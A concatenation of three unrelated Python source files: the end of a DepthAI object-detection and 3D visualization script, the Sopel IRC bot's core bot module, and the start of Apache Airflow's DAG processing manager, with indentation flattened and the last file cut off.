if should_remove(tracked_objects[i]):
# print(f'removing ${o}')
del tracked_objects[i]
else:
i += 1
# print(tracked_objects)
return [o for o in tracked_objects if o.n_detections >= MIN_DETECTIONS]
return track
# Tiny yolo v3/4 label texts
LABEL_MAP = [
"person", "bicycle", "car", "motorbike", "aeroplane", "bus", "train",
"truck", "boat", "traffic light", "fire hydrant", "stop sign", "parking meter", "bench",
"bird", "cat", "dog", "horse", "sheep", "cow", "elephant",
"bear", "zebra", "giraffe", "backpack", "umbrella", "handbag", "tie",
"suitcase", "frisbee", "skis", "snowboard", "sports ball", "kite", "baseball bat",
"baseball glove", "skateboard", "surfboard", "tennis racket", "bottle", "wine glass", "cup",
"fork", "knife", "spoon", "bowl", "banana", "apple", "sandwich",
"orange", "broccoli", "carrot", "hot dog", "pizza", "donut", "cake",
"chair", "sofa", "pottedplant", "bed", "diningtable", "toilet", "tvmonitor",
"laptop", "mouse", "remote", "keyboard", "cell phone", "microwave", "oven",
"toaster", "sink", "refrigerator", "book", "clock", "vase", "scissors",
"teddy bear", "hair drier", "toothbrush"
]
SELECTED_LABELS = ['mouse', 'cup', 'dog']
def make_camera_wireframe(aspect=640/400., scale=0.05):
# camera "frustum"
corners = [[-1, -1], [1, -1], [1, 1], [-1, 1], [-1, -1]]
cam_wire = []
for x, y in corners:
cam_wire.append([x*aspect, y, 1])
for x, y in corners:
cam_wire.append([x*aspect, y, 1])
cam_wire.append([0, 0, 0])
return (scale * np.array(cam_wire)).tolist()
class MatplotlibVisualization:
"""
Interactive / real-time 3D line & point visualization using Matplotlib.
This is quite far from the comfort zone of MPL and not very extensible.
"""
def __init__(self):
from mpl_toolkits.mplot3d import Axes3D
from matplotlib.animation import FuncAnimation
fig = plt.figure()
ax = Axes3D(fig, auto_add_to_figure=False)
fig.add_axes(ax)
ax_bounds = (-0.5, 0.5) # meters
ax.set(xlim=ax_bounds, ylim=ax_bounds, zlim=ax_bounds)
ax.view_init(azim=-140) # initial plot orientation
empty_xyz = lambda: { c: [] for c in 'xyz' }
vio_data = empty_xyz()
vio_data['plot'] = ax.plot(
xs=[], ys=[], zs=[],
linestyle="-",
marker="",
label='VIO trajectory'
)
vio_cam_data = empty_xyz()
vio_cam_data['plot'] = ax.plot(
xs=[], ys=[], zs=[],
linestyle="-",
marker="",
label='current cam pose'
)
detection_data = empty_xyz()
detection_data['labels'] = []
detection_data['plot'] = ax.plot(
xs=[], ys=[], zs=[],
linestyle="",
marker="o",
label=' or '.join(SELECTED_LABELS)
)
ax.legend()
ax.set_xlabel("x (m)")
ax.set_ylabel("y (m)")
ax.set_zlabel("z (m)")
#title = ax.set_title("Spatial AI demo")
def on_close(*args):
self.should_close = True
fig.canvas.mpl_connect('close_event', on_close)
self.cam_wire = make_camera_wireframe()
self.vio_data = vio_data
self.vio_cam_data = vio_cam_data
self.detection_data = detection_data
self.should_close = False
def update_graph(*args):
r = []
for graph in [self.vio_data, self.vio_cam_data, self.detection_data]:
p = graph['plot'][0]
x, y, z = [np.array(graph[c]) for c in 'xyz']
p.set_data(x, y)
p.set_3d_properties(z)
r.append(p)
return tuple(r)
self._anim = FuncAnimation(fig, update_graph, interval=15, blit=True)
def update_vio(self, vio_out):
if self.should_close: return False
view_mat = vio_out.pose.asMatrix()
for c in 'xyz': self.vio_cam_data[c] = []
for vertex in self.cam_wire:
p_local = np.array(vertex + [1])
p_world = (view_mat @ p_local)[:3]
for i, c in enumerate('xyz'):
self.vio_cam_data[c].append(p_world[i])
for c in 'xyz':
self.vio_data[c].append(getattr(vio_out.pose.position, c))
return True
def update_detected_objects(self, tracked_objects):
if self.should_close: return False
for i in range(3):
self.detection_data['xyz'[i]] = np.array([o.position[i] for o in tracked_objects])
self.detection_data['labels'] = [o.label for o in tracked_objects]
return True
def start_in_parallel_with(self, parallel_thing):
thread = threading.Thread(target = parallel_thing)
thread.start()
plt.show()
thread.join()
def draw_detections_on_rgb_frame(frame, detections, fps):
# If the frame is available, draw bounding boxes on it and show the frame
height = frame.shape[0]
width = frame.shape[1]
for detection in detections:
# Denormalize bounding box
x1 = int(detection.xmin * width)
x2 = int(detection.xmax * width)
y1 = int(detection.ymin * height)
y2 = int(detection.ymax * height)
try:
label = LABEL_MAP[detection.label]
except:
label = detection.label
if label in SELECTED_LABELS:
color = (0, 255, 0)
cv2.putText(frame, str(label), (x1 + 10, y1 + 20), cv2.FONT_HERSHEY_TRIPLEX, 0.5, 255)
cv2.putText(frame, "{:.2f}".format(detection.confidence*100), (x1 + 10, y1 + 35), cv2.FONT_HERSHEY_TRIPLEX, 0.5, 255)
cv2.putText(frame, f"X: {int(detection.spatialCoordinates.x)} mm", (x1 + 10, y1 + 50), cv2.FONT_HERSHEY_TRIPLEX, 0.5, 255)
cv2.putText(frame, f"Y: {int(detection.spatialCoordinates.y)} mm", (x1 + 10, y1 + 65), cv2.FONT_HERSHEY_TRIPLEX, 0.5, 255)
cv2.putText(frame, f"Z: {int(detection.spatialCoordinates.z)} mm", (x1 + 10, y1 + 80), cv2.FONT_HERSHEY_TRIPLEX, 0.5, 255)
else:
color = (255, 0, 0)
cv2.rectangle(frame, (x1, y1), (x2, y2), color, cv2.FONT_HERSHEY_SIMPLEX)
color = (255, 255, 255)
cv2.putText(frame, "NN fps: {:.2f}".format(fps), (2, frame.shape[0] - 4), cv2.FONT_HERSHEY_TRIPLEX, 0.4, color)
if __name__ == '__main__':
nnBlobPath = 'models/yolo-v4-tiny-tf_openvino_2021.4_6shave.blob'
if len(sys.argv) > 1:
nnBlobPath = sys.argv[1]
if not Path(nnBlobPath).exists():
        raise FileNotFoundError(f'Could not find {nnBlobPath}')
showRgb = True
pipeline, vio_pipeline = make_pipelines(nnBlobPath, showRgb)
with dai.Device(pipeline) as device:
visu_3d = MatplotlibVisualization()
def main_loop():
startTime = time.monotonic()
counter = 0
fps = 0
color = (255, 255, 255)
vio_session = vio_pipeline.startSession(device)
tracker = make_tracker()
if showRgb: previewQueue = device.getOutputQueue(name="rgb", maxSize=4, blocking=False)
detectionNNQueue = device.getOutputQueue(name="detections", maxSize=4, blocking=False)
xoutBoundingBoxDepthMappingQueue = device.getOutputQueue(name="boundingBoxDepthMapping", maxSize=4, blocking=False)
vio_matrix = None
while True:
if vio_session.hasOutput():
vio_out = vio_session.getOutput()
vio_matrix = vio_out.pose.asMatrix()
if not visu_3d.update_vio(vio_out): break
elif detectionNNQueue.has():
if showRgb:
inPreview = previewQueue.get()
frame = inPreview.getCvFrame()
inDet = detectionNNQueue.get()
# TODO: depth hook
#depthFrame = depth.getFrame()
#depthFrameColor = cv2.normalize(depthFrame, None, 255, 0, cv2.NORM_INF, cv2.CV_8UC1)
#depthFrameColor = cv2.equalizeHist(depthFrameColor)
#depthFrameColor = cv2.applyColorMap(depthFrameColor, cv2.COLORMAP_HOT)
counter+=1
current_time = time.monotonic()
if (current_time - startTime) > 1 :
fps = counter / (current_time - startTime)
counter = 0
startTime = current_time
detections = inDet.detections
if len(detections) != 0:
boundingBoxMapping = xoutBoundingBoxDepthMappingQueue.get()
roiDatas = boundingBoxMapping.getConfigData()
if vio_matrix is not None:
detections_world = tracker(current_time, detections, vio_matrix)
visu_3d.update_detected_objects(detections_world)
if showRgb:
draw_detections_on_rgb_frame(frame, detections, fps)
cv2.imshow("rgb", frame)
if cv2.waitKey(1) == ord('q'):
break
else:
time.sleep(0.005)
vio_session.close()
visu_3d.start_in_parallel_with(main_loop)
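# --- Illustrative sketch, not part of the original script ---
# The tracker above receives vio_out.pose.asMatrix(), a 4x4 pose matrix, and
# the visualization consumes world-frame positions. Assuming the matrix maps
# camera coordinates to world coordinates, applying it to a camera-frame point
# with plain numpy (the helper name is hypothetical) looks like this:
def camera_point_to_world(pose_matrix, p_cam):
    import numpy as np
    p_hom = np.array([p_cam[0], p_cam[1], p_cam[2], 1.0])   # homogeneous point
    return (np.asarray(pose_matrix) @ p_hom)[:3]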
|
bot.py
|
# coding=utf-8
# Copyright 2008, Sean B. Palmer, inamidst.com
# Copyright © 2012, Elad Alfassa <elad@fedoraproject.org>
# Copyright 2012-2015, Elsie Powell, http://embolalia.com
#
# Licensed under the Eiffel Forum License 2.
from __future__ import unicode_literals, absolute_import, print_function, division
import collections
import os
import re
import sys
import threading
import time
from sopel import tools
from sopel import irc
from sopel.db import SopelDB
from sopel.tools import stderr, Identifier
import sopel.tools.jobs
from sopel.trigger import Trigger
from sopel.module import NOLIMIT
from sopel.logger import get_logger
import sopel.loader
LOGGER = get_logger(__name__)
if sys.version_info.major >= 3:
unicode = str
basestring = str
py3 = True
else:
py3 = False
class _CapReq(object):
def __init__(self, prefix, module, failure=None, arg=None, success=None):
def nop(bot, cap):
pass
# TODO at some point, reorder those args to be sane
self.prefix = prefix
self.module = module
self.arg = arg
self.failure = failure or nop
self.success = success or nop
class Sopel(irc.Bot):
def __init__(self, config, daemon=False):
irc.Bot.__init__(self, config)
self._daemon = daemon # Used for iPython. TODO something saner here
# `re.compile('.*') is re.compile('.*')` because of caching, so we need
# to associate a list with each regex, since they are unexpectedly
# indistinct.
self._callables = {
'high': collections.defaultdict(list),
'medium': collections.defaultdict(list),
'low': collections.defaultdict(list)
}
self.config = config
"""The :class:`sopel.config.Config` for the current Sopel instance."""
self.doc = {}
"""
A dictionary of command names to their docstring and example, if
declared. The first item in a callable's commands list is used as the
key in version *3.2* onward. Prior to *3.2*, the name of the function
as declared in the source code was used.
"""
self._command_groups = collections.defaultdict(list)
"""A mapping of module names to a list of commands in it."""
self.stats = {} # deprecated, remove in 7.0
self._times = {}
"""
        A dictionary mapping lower-cased nicks to dictionaries which map
        function names to the time at which they were last used by that nick.
"""
self.server_capabilities = {}
"""A dict mapping supported IRCv3 capabilities to their options.
For example, if the server specifies the capability ``sasl=EXTERNAL``,
it will be here as ``{"sasl": "EXTERNAL"}``. Capabilities specified
without any options will have ``None`` as the value.
For servers that do not support IRCv3, this will be an empty set."""
self.enabled_capabilities = set()
"""A set containing the IRCv3 capabilities that the bot has enabled."""
self._cap_reqs = dict()
"""A dictionary of capability names to a list of requests"""
self.privileges = dict()
"""A dictionary of channels to their users and privilege levels
The value associated with each channel is a dictionary of
:class:`sopel.tools.Identifier`\\s to
a bitwise integer value, determined by combining the appropriate
constants from :mod:`sopel.module`.
.. deprecated:: 6.2.0
Use :attr:`channels` instead.
"""
self.channels = tools.SopelMemory() # name to chan obj
"""A map of the channels that Sopel is in.
The keys are Identifiers of the channel names, and map to
:class:`sopel.tools.target.Channel` objects which contain the users in
the channel and their permissions.
"""
self.users = tools.SopelMemory() # name to user obj
"""A map of the users that Sopel is aware of.
The keys are Identifiers of the nicknames, and map to
:class:`sopel.tools.target.User` instances. In order for Sopel to be
aware of a user, it must be in at least one channel which they are also
in.
"""
self.db = SopelDB(config)
"""The bot's database, as a :class:`sopel.db.SopelDB` instance."""
self.memory = tools.SopelMemory()
"""
A thread-safe dict for storage of runtime data to be shared between
modules. See :class:`sopel.tools.Sopel.SopelMemory`
"""
self.shutdown_methods = []
"""List of methods to call on shutdown"""
self.scheduler = sopel.tools.jobs.JobScheduler(self)
self.scheduler.start()
# Set up block lists
# Default to empty
if not self.config.core.nick_blocks:
self.config.core.nick_blocks = []
if not self.config.core.host_blocks:
self.config.core.host_blocks = []
self.setup()
# Backwards-compatibility aliases to attributes made private in 6.2. Remove
# these in 7.0
times = property(lambda self: getattr(self, '_times'))
command_groups = property(lambda self: getattr(self, '_command_groups'))
def write(self, args, text=None): # Shim this in here for autodocs
"""Send a command to the server.
``args`` is an iterable of strings, which are joined by spaces.
``text`` is treated as though it were the final item in ``args``, but
        is preceded by a ``:``. This is a special case which means that
``text``, unlike the items in ``args`` may contain spaces (though this
constraint is not checked by ``write``).
In other words, both ``sopel.write(('PRIVMSG',), 'Hello, world!')``
and ``sopel.write(('PRIVMSG', ':Hello, world!'))`` will send
``PRIVMSG :Hello, world!`` to the server.
Newlines and carriage returns ('\\n' and '\\r') are removed before
        sending. Additionally, if the message (after joining) is longer than
        510 characters, any remaining characters will not be sent.
"""
irc.Bot.write(self, args, text=text)
def setup(self):
stderr("\nWelcome to Sopel. Loading modules...\n\n")
modules = sopel.loader.enumerate_modules(self.config)
error_count = 0
success_count = 0
for name in modules:
path, type_ = modules[name]
try:
module, _ = sopel.loader.load_module(name, path, type_)
except Exception as e:
error_count = error_count + 1
filename, lineno = tools.get_raising_file_and_line()
rel_path = os.path.relpath(filename, os.path.dirname(__file__))
raising_stmt = "%s:%d" % (rel_path, lineno)
stderr("Error loading %s: %s (%s)" % (name, e, raising_stmt))
else:
try:
if hasattr(module, 'setup'):
module.setup(self)
relevant_parts = sopel.loader.clean_module(
module, self.config)
except Exception as e:
error_count = error_count + 1
filename, lineno = tools.get_raising_file_and_line()
rel_path = os.path.relpath(
filename, os.path.dirname(__file__)
)
raising_stmt = "%s:%d" % (rel_path, lineno)
stderr("Error in %s setup procedure: %s (%s)"
% (name, e, raising_stmt))
else:
self.register(*relevant_parts)
success_count += 1
if len(modules) > 1: # coretasks is counted
stderr('\n\nRegistered %d modules,' % (success_count - 1))
stderr('%d modules failed to load\n\n' % error_count)
else:
stderr("Warning: Couldn't load any modules")
def unregister(self, obj):
if not callable(obj):
return
if hasattr(obj, 'rule'): # commands and intents have it added
for rule in obj.rule:
callb_list = self._callables[obj.priority][rule]
if obj in callb_list:
callb_list.remove(obj)
if hasattr(obj, 'interval'):
# TODO this should somehow find the right job to remove, rather than
# clearing the entire queue. Issue #831
self.scheduler.clear_jobs()
if (getattr(obj, '__name__', None) == 'shutdown' and
obj in self.shutdown_methods):
self.shutdown_methods.remove(obj)
def register(self, callables, jobs, shutdowns, urls):
# Append module's shutdown function to the bot's list of functions to
# call on shutdown
self.shutdown_methods += shutdowns
for callbl in callables:
if hasattr(callbl, 'rule'):
for rule in callbl.rule:
self._callables[callbl.priority][rule].append(callbl)
else:
self._callables[callbl.priority][re.compile('.*')].append(callbl)
if hasattr(callbl, 'commands'):
module_name = callbl.__module__.rsplit('.', 1)[-1]
# TODO doc and make decorator for this. Not sure if this is how
# it should work yet, so not making it public for 6.0.
category = getattr(callbl, 'category', module_name)
self._command_groups[category].append(callbl.commands[0])
for command, docs in callbl._docs.items():
self.doc[command] = docs
for func in jobs:
for interval in func.interval:
job = sopel.tools.jobs.Job(interval, func)
self.scheduler.add_job(job)
if not self.memory.contains('url_callbacks'):
self.memory['url_callbacks'] = tools.SopelMemory()
for func in urls:
self.memory['url_callbacks'][func.url_regex] = func
def part(self, channel, msg=None):
"""Part a channel."""
self.write(['PART', channel], msg)
def join(self, channel, password=None):
"""Join a channel
If `channel` contains a space, and no `password` is given, the space is
assumed to split the argument into the channel to join and its
password. `channel` should not contain a space if `password` is given.
"""
if password is None:
self.write(('JOIN', channel))
else:
self.write(['JOIN', channel, password])
def msg(self, recipient, text, max_messages=1):
# Deprecated, but way too much of a pain to remove.
self.say(text, recipient, max_messages)
def say(self, text, recipient, max_messages=1):
"""Send ``text`` as a PRIVMSG to ``recipient``.
In the context of a triggered callable, the ``recipient`` defaults to
the channel (or nickname, if a private message) from which the message
was received.
By default, this will attempt to send the entire ``text`` in one
message. If the text is too long for the server, it may be truncated.
If ``max_messages`` is given, the ``text`` will be split into at most
that many messages, each no more than 400 bytes. The split is made at
the last space character before the 400th byte, or at the 400th byte if
no such space exists. If the ``text`` is too long to fit into the
specified number of messages using the above splitting, the final
message will contain the entire remainder, which may be truncated by
the server.
"""
# We're arbitrarily saying that the max is 400 bytes of text when
        # messages will be split. Otherwise, we'd have to account for the bot's
# hostmask, which is hard.
max_text_length = 400
        # Encode to bytes, for proper length calculation
if isinstance(text, unicode):
encoded_text = text.encode('utf-8')
else:
encoded_text = text
excess = ''
if max_messages > 1 and len(encoded_text) > max_text_length:
last_space = encoded_text.rfind(' '.encode('utf-8'), 0, max_text_length)
if last_space == -1:
excess = encoded_text[max_text_length:]
encoded_text = encoded_text[:max_text_length]
else:
excess = encoded_text[last_space + 1:]
encoded_text = encoded_text[:last_space]
# We'll then send the excess at the end
# Back to unicode again, so we don't screw things up later.
text = encoded_text.decode('utf-8')
try:
self.sending.acquire()
# No messages within the last 3 seconds? Go ahead!
# Otherwise, wait so it's been at least 0.8 seconds + penalty
recipient_id = Identifier(recipient)
self.write(('PRIVMSG', recipient), text)
finally:
self.sending.release()
# Now that we've sent the first part, we need to send the rest. Doing
# this recursively seems easier to me than iteratively
if excess:
self.msg(recipient, excess, max_messages - 1)
def notice(self, text, dest):
"""Send an IRC NOTICE to a user or a channel.
Within the context of a triggered callable, ``dest`` will default to
the channel (or nickname, if a private message), in which the trigger
happened.
"""
self.write(('NOTICE', dest), text)
def action(self, text, dest):
"""Send ``text`` as a CTCP ACTION PRIVMSG to ``dest``.
The same loop detection and length restrictions apply as with
:func:`say`, though automatic message splitting is not available.
Within the context of a triggered callable, ``dest`` will default to
the channel (or nickname, if a private message), in which the trigger
happened.
"""
self.say('\001ACTION {}\001'.format(text), dest)
def reply(self, text, dest, reply_to, notice=False):
"""Prepend ``reply_to`` to ``text``, and send as a PRIVMSG to ``dest``.
If ``notice`` is ``True``, send a NOTICE rather than a PRIVMSG.
The same loop detection and length restrictions apply as with
:func:`say`, though automatic message splitting is not available.
Within the context of a triggered callable, ``reply_to`` will default to
the nickname of the user who triggered the call, and ``dest`` to the
channel (or nickname, if a private message), in which the trigger
happened.
"""
text = '%s: %s' % (reply_to, text)
if notice:
self.notice(text, dest)
else:
self.say(text, dest)
class SopelWrapper(object):
def __init__(self, sopel, trigger):
# The custom __setattr__ for this class sets the attribute on the
# original bot object. We don't want that for these, so we set them
# with the normal __setattr__.
object.__setattr__(self, '_bot', sopel)
object.__setattr__(self, '_trigger', trigger)
def __dir__(self):
classattrs = [attr for attr in self.__class__.__dict__
if not attr.startswith('__')]
return list(self.__dict__) + classattrs + dir(self._bot)
def __getattr__(self, attr):
return getattr(self._bot, attr)
def __setattr__(self, attr, value):
return setattr(self._bot, attr, value)
def say(self, message, destination=None, max_messages=1):
if destination is None:
destination = self._trigger.sender
self._bot.say(message, destination, max_messages)
def action(self, message, destination=None):
if destination is None:
destination = self._trigger.sender
self._bot.action(message, destination)
def notice(self, message, destination=None):
if destination is None:
destination = self._trigger.sender
self._bot.notice(message, destination)
def reply(self, message, destination=None, reply_to=None, notice=False):
if destination is None:
destination = self._trigger.sender
if reply_to is None:
reply_to = self._trigger.nick
self._bot.reply(message, destination, reply_to, notice)
def call(self, func, sopel, trigger):
nick = trigger.nick
current_time = time.time()
if nick not in self._times:
self._times[nick] = dict()
if self.nick not in self._times:
self._times[self.nick] = dict()
if not trigger.is_privmsg and trigger.sender not in self._times:
self._times[trigger.sender] = dict()
if not trigger.admin and not func.unblockable:
if func in self._times[nick]:
usertimediff = current_time - self._times[nick][func]
if func.rate > 0 and usertimediff < func.rate:
#self._times[nick][func] = current_time
LOGGER.info(
"%s prevented from using %s in %s due to user limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, usertimediff,
func.rate
)
return
if func in self._times[self.nick]:
globaltimediff = current_time - self._times[self.nick][func]
if func.global_rate > 0 and globaltimediff < func.global_rate:
#self._times[self.nick][func] = current_time
LOGGER.info(
"%s prevented from using %s in %s due to global limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, globaltimediff,
func.global_rate
)
return
if not trigger.is_privmsg and func in self._times[trigger.sender]:
chantimediff = current_time - self._times[trigger.sender][func]
if func.channel_rate > 0 and chantimediff < func.channel_rate:
#self._times[trigger.sender][func] = current_time
LOGGER.info(
"%s prevented from using %s in %s due to channel limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, chantimediff,
func.channel_rate
)
return
try:
exit_code = func(sopel, trigger)
except Exception: # TODO: Be specific
exit_code = None
self.error(trigger)
if exit_code != NOLIMIT:
self._times[nick][func] = current_time
self._times[self.nick][func] = current_time
if not trigger.is_privmsg:
self._times[trigger.sender][func] = current_time
def dispatch(self, pretrigger):
args = pretrigger.args
event, args, text = pretrigger.event, args, args[-1] if args else ''
if self.config.core.nick_blocks or self.config.core.host_blocks:
nick_blocked = self._nick_blocked(pretrigger.nick)
host_blocked = self._host_blocked(pretrigger.host)
else:
nick_blocked = host_blocked = None
list_of_blocked_functions = []
for priority in ('high', 'medium', 'low'):
items = self._callables[priority].items()
for regexp, funcs in items:
match = regexp.match(text)
if not match:
continue
user_obj = self.users.get(pretrigger.nick)
account = user_obj.account if user_obj else None
trigger = Trigger(self.config, pretrigger, match, account)
wrapper = self.SopelWrapper(self, trigger)
for func in funcs:
if (not trigger.admin and
not func.unblockable and
(nick_blocked or host_blocked)):
function_name = "%s.%s" % (
func.__module__, func.__name__
)
list_of_blocked_functions.append(function_name)
continue
if event not in func.event:
continue
if hasattr(func, 'intents'):
if not trigger.tags.get('intent'):
continue
match = False
for intent in func.intents:
if intent.match(trigger.tags.get('intent')):
match = True
if not match:
continue
if func.thread:
targs = (func, wrapper, trigger)
t = threading.Thread(target=self.call, args=targs)
t.start()
else:
self.call(func, wrapper, trigger)
if list_of_blocked_functions:
if nick_blocked and host_blocked:
block_type = 'both'
elif nick_blocked:
block_type = 'nick'
else:
block_type = 'host'
LOGGER.info(
"[%s]%s prevented from using %s.",
block_type,
trigger.nick,
', '.join(list_of_blocked_functions)
)
def _host_blocked(self, host):
bad_masks = self.config.core.host_blocks
for bad_mask in bad_masks:
bad_mask = bad_mask.strip()
if not bad_mask:
continue
if (re.match(bad_mask + '$', host, re.IGNORECASE) or
bad_mask == host):
return True
return False
def _nick_blocked(self, nick):
bad_nicks = self.config.core.nick_blocks
for bad_nick in bad_nicks:
bad_nick = bad_nick.strip()
if not bad_nick:
continue
if (re.match(bad_nick + '$', nick, re.IGNORECASE) or
Identifier(bad_nick) == nick):
return True
return False
def _shutdown(self):
stderr(
'Calling shutdown for %d modules.' % (len(self.shutdown_methods),)
)
for shutdown_method in self.shutdown_methods:
try:
stderr(
"calling %s.%s" % (
shutdown_method.__module__, shutdown_method.__name__,
)
)
shutdown_method(self)
except Exception as e:
stderr(
"Error calling shutdown method for module %s:%s" % (
shutdown_method.__module__, e
)
)
def cap_req(self, module_name, capability, arg=None, failure_callback=None,
success_callback=None):
"""Tell Sopel to request a capability when it starts.
By prefixing the capability with `-`, it will be ensured that the
        capability is not enabled. Similarly, by prefixing the capability with
`=`, it will be ensured that the capability is enabled. Requiring and
disabling is "first come, first served"; if one module requires a
capability, and another prohibits it, this function will raise an
exception in whichever module loads second. An exception will also be
raised if the module is being loaded after the bot has already started,
and the request would change the set of enabled capabilities.
If the capability is not prefixed, and no other module prohibits it, it
will be requested. Otherwise, it will not be requested. Since
capability requests that are not mandatory may be rejected by the
server, as well as by other modules, a module which makes such a
request should account for that possibility.
The actual capability request to the server is handled after the
completion of this function. In the event that the server denies a
request, the `failure_callback` function will be called, if provided.
The arguments will be a `Sopel` object, and the capability which was
rejected. This can be used to disable callables which rely on the
        capability. It will be called either if the server NAKs the request,
or if the server enabled it and later DELs it.
The `success_callback` function will be called upon acknowledgement of
the capability from the server, whether during the initial capability
negotiation, or later.
If ``arg`` is given, and does not exactly match what the server
provides or what other modules have requested for that capability, it is
considered a conflict.
"""
# TODO raise better exceptions
cap = capability[1:]
prefix = capability[0]
entry = self._cap_reqs.get(cap, [])
if any((ent.arg != arg for ent in entry)):
raise Exception('Capability conflict')
if prefix == '-':
if self.connection_registered and cap in self.enabled_capabilities:
raise Exception('Can not change capabilities after server '
'connection has been completed.')
if any((ent.prefix != '-' for ent in entry)):
raise Exception('Capability conflict')
entry.append(_CapReq(prefix, module_name, failure_callback, arg,
success_callback))
self._cap_reqs[cap] = entry
else:
if prefix != '=':
cap = capability
prefix = ''
if self.connection_registered and (cap not in
self.enabled_capabilities):
raise Exception('Can not change capabilities after server '
'connection has been completed.')
# Non-mandatory will callback at the same time as if the server
# rejected it.
if any((ent.prefix == '-' for ent in entry)) and prefix == '=':
raise Exception('Capability conflict')
entry.append(_CapReq(prefix, module_name, failure_callback, arg,
success_callback))
self._cap_reqs[cap] = entry
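# --- Illustrative sketch, not part of the original module ---
# say() above splits long messages at the last space before an arbitrary
# 400-byte limit measured on the UTF-8 encoding, and sends the remainder
# recursively. The split step on its own (the function name is hypothetical;
# errors='ignore' guards against cutting a multi-byte character) could look
# like this:
def split_irc_text(text, max_bytes=400):
    encoded = text.encode('utf-8')
    if len(encoded) <= max_bytes:
        return text, ''
    last_space = encoded.rfind(b' ', 0, max_bytes)
    if last_space == -1:
        head, tail = encoded[:max_bytes], encoded[max_bytes:]
    else:
        head, tail = encoded[:last_space], encoded[last_space + 1:]
    return head.decode('utf-8', errors='ignore'), tail.decode('utf-8', errors='ignore')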
|
manager.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Processes DAGs."""
import enum
import importlib
import inspect
import logging
import multiprocessing
import os
import random
import signal
import sys
import time
from collections import defaultdict
from datetime import datetime, timedelta
from importlib import import_module
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import TYPE_CHECKING, Any, Dict, List, NamedTuple, Optional, Union, cast
from setproctitle import setproctitle
from sqlalchemy import or_
from tabulate import tabulate
import airflow.models
from airflow.configuration import conf
from airflow.dag_processing.processor import DagFileProcessorProcess
from airflow.models import DagModel, errors
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import SimpleTaskInstance
from airflow.settings import STORE_DAG_CODE
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.callback_requests import CallbackRequest, SlaCallbackRequest, TaskCallbackRequest
from airflow.utils.file import list_py_file_paths
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.net import get_hostname
from airflow.utils.process_utils import kill_child_processes_by_pids, reap_process_group
from airflow.utils.session import provide_session
from airflow.utils.state import State
if TYPE_CHECKING:
import pathlib
class DagParsingStat(NamedTuple):
"""Information on processing progress"""
done: bool
all_files_processed: bool
class DagFileStat(NamedTuple):
"""Information about single processing of one file"""
num_dags: int
import_errors: int
last_finish_time: Optional[datetime]
last_duration: Optional[float]
run_count: int
class DagParsingSignal(enum.Enum):
"""All signals sent to parser."""
AGENT_RUN_ONCE = 'agent_run_once'
TERMINATE_MANAGER = 'terminate_manager'
END_MANAGER = 'end_manager'
class DagFileProcessorAgent(LoggingMixin, MultiprocessingStartMethodMixin):
"""
    Agent for DAG file processing. It is responsible for all DAG parsing
    related jobs in the scheduler process. Mainly it can spin up a
    DagFileProcessorManager in a subprocess, collect DAG parsing results from
    it and communicate signals/DAG parsing stats with it.
This class runs in the main `airflow scheduler` process.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: str
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param pickle_dags: whether to pickle DAGs.
    :type pickle_dags: bool
:param async_mode: Whether to start agent in async mode
:type async_mode: bool
"""
def __init__(
self,
dag_directory: str,
max_runs: int,
processor_timeout: timedelta,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool,
):
super().__init__()
self._file_path_queue: List[str] = []
self._dag_directory: str = dag_directory
self._max_runs = max_runs
self._processor_timeout = processor_timeout
self._dag_ids = dag_ids
self._pickle_dags = pickle_dags
self._async_mode = async_mode
# Map from file path to the processor
self._processors: Dict[str, DagFileProcessorProcess] = {}
# Pipe for communicating signals
self._process: Optional[multiprocessing.process.BaseProcess] = None
self._done: bool = False
# Initialized as true so we do not deactivate w/o any actual DAG parsing.
self._all_files_processed = True
self._parent_signal_conn: Optional[MultiprocessingConnection] = None
self._last_parsing_stat_received_at: float = time.monotonic()
def start(self) -> None:
"""Launch DagFileProcessorManager processor and start DAG parsing loop in manager."""
mp_start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(mp_start_method)
self._last_parsing_stat_received_at = time.monotonic()
self._parent_signal_conn, child_signal_conn = context.Pipe()
process = context.Process(
target=type(self)._run_processor_manager,
args=(
self._dag_directory,
self._max_runs,
self._processor_timeout,
child_signal_conn,
self._dag_ids,
self._pickle_dags,
self._async_mode,
),
)
self._process = process
process.start()
self.log.info("Launched DagFileProcessorManager with pid: %s", process.pid)
def run_single_parsing_loop(self) -> None:
"""
        Should only be used when the DAG file processor manager was launched in sync mode.
Send agent heartbeat signal to the manager, requesting that it runs one
processing "loop".
Call wait_until_finished to ensure that any launched processors have
finished before continuing
"""
if not self._parent_signal_conn or not self._process:
raise ValueError("Process not started.")
if not self._process.is_alive():
return
try:
self._parent_signal_conn.send(DagParsingSignal.AGENT_RUN_ONCE)
except ConnectionError:
            # If the manager died because of an error, it will be noticed and
            # restarted when harvest_serialized_dags calls _heartbeat_manager.
pass
def send_callback_to_execute(self, request: CallbackRequest) -> None:
"""
Sends information about the callback to be executed by DagFileProcessor.
:param request: Callback request to be executed.
:type request: CallbackRequest
"""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
try:
self._parent_signal_conn.send(request)
except ConnectionError:
            # If the manager died because of an error, it will be noticed and
            # restarted when harvest_serialized_dags calls _heartbeat_manager.
pass
